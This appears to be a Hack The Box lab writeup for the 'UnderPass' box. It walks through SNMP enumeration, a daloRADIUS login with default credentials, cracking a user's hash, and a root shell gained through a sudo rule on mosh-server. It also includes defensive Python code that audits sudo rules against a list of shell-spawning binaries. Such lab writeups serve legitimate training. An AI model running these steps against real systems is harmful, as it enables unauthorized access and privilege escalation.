
UnderPass Hackthebox Writeup

An easy box from HTB. We first get access to daloRADIUS with weak credentials and use it to expose a potential user along with his (weakly) hashed password; I crack the hash to recover the plaintext password, and we use it to log in to the host via SSH. Easy win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀

Enumeration

I start off with my nmap-scan:

➜ nmap -sS -sV -sC 10.10.11.48 -oN nmap-scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:32 EAT
Nmap scan report for 10.10.11.48
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds

We find only two open TCP ports, and running a directory search on port 80 doesn't reveal anything juicy, so I proceed to run a UDP scan with nmap:

➜ nmap -sU -sV --top-ports=10 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:42 EAT
Nmap scan report for 10.10.11.48
Host is up (0.14s latency).

PORT     STATE  SERVICE      VERSION
53/udp   closed domain
67/udp   closed dhcps
123/udp  closed ntp
135/udp  closed msrpc
137/udp  closed netbios-ns
138/udp  closed netbios-dgm
161/udp  open   snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
445/udp  closed microsoft-ds
631/udp  closed ipp
1434/udp closed ms-sql-m
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

We can see that port 161/udp (SNMP) is open, and the Service Info line already reveals the hostname and a system description.

SNMP Enumeration

You can learn more about SNMP pentesting here.

I use snmpbulkwalk with the public community string to walk the available OIDs:

snmpbulkwalk -c public -v2c 10.10.11.48 .


We get three interesting things from the output:

  1. steve@underpass.htb
  2. Hex String (07E90509163303002B0000)
  3. "UnDerPass.htb is the only daloradius server in the basin!"
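The hex string is 11 bytes long, which is the size of an SNMP DateAndTime octet string (the RFC 2579 textual convention used by objects such as hrSystemDate), so it is the agent's clock rather than a secret. The decoder below is an added example, not part of the original writeup: it decodes that format, generalizes to the 8-byte form without a UTC offset, and rejects malformed input instead of silently producing a date. Decoding the value from the walk gives 2025-05-09T22:51:03+00:00, which lines up with the 01:32 EAT (UTC+3) nmap timestamps above.

```python
"""Decode an SNMP DateAndTime octet string (RFC 2579 textual convention).

Added example, not part of the original writeup. The 11-byte hex string
pulled from the SNMP walk is interpreted here as DateAndTime, the encoding
used by objects such as hrSystemDate.
"""
from datetime import datetime, timedelta, timezone


def decode_date_and_time(hex_string: str) -> datetime:
    """Return the datetime encoded by an 8- or 11-byte DateAndTime value.

    Layout (RFC 2579): year (2 bytes, big-endian), month, day, hour, minute,
    second, deci-seconds, then optionally '+'/'-', hours and minutes from UTC.
    The 8-byte form carries no offset, so a naive datetime is returned.
    """
    raw = bytes.fromhex(hex_string.replace(" ", ""))
    if len(raw) not in (8, 11):
        raise ValueError(f"DateAndTime must be 8 or 11 bytes, got {len(raw)}")

    year = int.from_bytes(raw[0:2], "big")
    month, day, hour, minute, second, deci = raw[2:8]
    if deci > 9:
        raise ValueError(f"deci-seconds out of range: {deci}")

    tzinfo = None
    if len(raw) == 11:
        direction, off_hours, off_minutes = raw[8:11]
        if direction not in (0x2B, 0x2D):  # ASCII '+' or '-'
            raise ValueError("UTC direction must be '+' (0x2B) or '-' (0x2D)")
        if off_hours > 13 or off_minutes > 59:
            raise ValueError("UTC offset out of range")
        offset = timedelta(hours=off_hours, minutes=off_minutes)
        if direction == 0x2D:
            offset = -offset
        tzinfo = timezone(offset)

    # datetime() itself rejects impossible month/day/hour/minute/second values.
    return datetime(year, month, day, hour, minute, second,
                    microsecond=deci * 100_000, tzinfo=tzinfo)


def describe(hex_string: str) -> str:
    """Human-readable ISO 8601 form, or an error message instead of an exception."""
    try:
        return decode_date_and_time(hex_string).isoformat()
    except ValueError as exc:
        return f"not a DateAndTime value ({exc})"


if __name__ == "__main__":
    # Value taken from the writeup's SNMP walk.
    print(describe("07E90509163303002B0000"))
    # Constructed inputs: the 8-byte form without an offset, and a malformed one.
    print(describe("07E9050916330300"))
    print(describe("DEADBEEF"))
```

Knowing what the value is matters for triage: a DateAndTime object tells you the agent's idea of the current time (useful for correlating logs), but it is not a credential or a token, so it should not be reported as a leak.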

This is the second time daloRADIUS shows up; searching for it in the browser you should find that it's a web management application:


Trying to access it on port 80 brings up a Forbidden page!

Initial Foothold

Reviewing the GitHub repository we can easily identify the login path, and there is an issue listing the default credentials that are expected to be used to log in.

Thus I proceed to the operators' login page and use the credentials administrator:radius:


Listing the users available we get a user named svcMosh with a hashed password:


Using john, hashcat, or CrackStation, whichever tool you prefer, you can easily crack the hash and get the plaintext password: underwaterfriends


Using the credentials svcMosh:underwaterfriends we are able to log in via SSH:


Privilege Escalation

The user is found to have sudo privileges on the binary /usr/bin/mosh-server:

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

So basically Mosh is a remote terminal tool, "a replacement for interactive SSH terminals". You can review the documentation to learn how it works and how to connect back to the mosh-server after starting it!

We first install mosh on our host with the command below:
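The point for a defender is that mosh-server is not a sudo-safe binary: it forks the caller's login shell as whatever uid sudo hands it, so a (ALL) NOPASSWD rule on it is the same as an unrestricted root shell. The script below is an added example (my code, not from the writeup or the Mosh project) that parses sudo -l output and flags such rules. The list of shell-spawning commands and the second, benign-looking systemctl rule in the sample are constructed for the example; the mosh-server rule is the one from the box.

```python
"""Audit `sudo -l` output for rules that amount to an unrestricted root shell.

Added example, not from the original writeup. It parses the text printed by
`sudo -l` and flags rules that (a) need no password, (b) run as root/ALL, or
(c) name a command that hands the caller an interactive shell, such as
mosh-server, which forks a login shell as whatever uid sudo gave it.
"""
import os
import re

# Constructed for this example: commands that spawn (or trivially lead to) an
# interactive shell. Extend this set for your own environment.
SHELL_SPAWNERS = {
    "ALL", "mosh-server", "bash", "sh", "zsh", "dash", "su", "vim", "vi",
    "less", "more", "python3", "perl", "find", "env",
}

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*"   # (runas_user[:runas_group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"     # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+?)\s*$"             # one or more comma-separated commands
)


def parse_sudo_l(output: str) -> list[dict]:
    """Extract one rule dict per command from the 'may run' section."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = set(re.findall(r"([A-Z]+):", match["tags"]))
        runas_user = match["runas"].split(":")[0].strip()
        for cmd in match["cmds"].split(","):
            cmd = cmd.strip()
            rules.append({
                "runas": runas_user,
                "tags": tags,
                "command": cmd,
                "basename": os.path.basename(cmd.split()[0]),
            })
    return rules


def audit(rules: list[dict]) -> list[dict]:
    """Return one finding per rule, with a severity and the reasons for it."""
    findings = []
    for rule in rules:
        reasons = []
        as_root = rule["runas"] in ("ALL", "root")
        spawns_shell = rule["basename"] in SHELL_SPAWNERS
        if as_root:
            reasons.append("runs as root")
        if "NOPASSWD" in rule["tags"]:
            reasons.append("no password required")
        if spawns_shell:
            reasons.append(f"{rule['basename']} yields an interactive shell")
        if as_root and spawns_shell:
            severity = "critical"  # equivalent to an unrestricted root shell
        elif as_root and "NOPASSWD" in rule["tags"]:
            severity = "high"
        elif reasons:
            severity = "medium"
        else:
            severity = "info"
        findings.append({"command": rule["command"], "severity": severity,
                         "reasons": reasons})
    return findings


# `sudo -l` output as shown in the writeup, plus one constructed benign-looking rule.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (root) /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{finding['severity']}] {finding['command']}: "
              f"{', '.join(finding['reasons'])}")
```

The remediation is to drop the rule entirely; there is no argument restriction that makes mosh-server safe under sudo, because the shell it spawns inherits the effective uid. If users genuinely need Mosh, let them run mosh-server as themselves (it does not need root), and keep the sudoers file under change review so a rule like this is caught before it ships.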

sudo apt-get install mosh

We then run the Mosh server on the target on port 61337:

sudo mosh-server new -p 61337

and, using the key it prints, connect back to it from our host:

MOSH_KEY={VALUE_OF_KEY} mosh-client 10.10.11.48 61337

We get an interactive shell session as root!

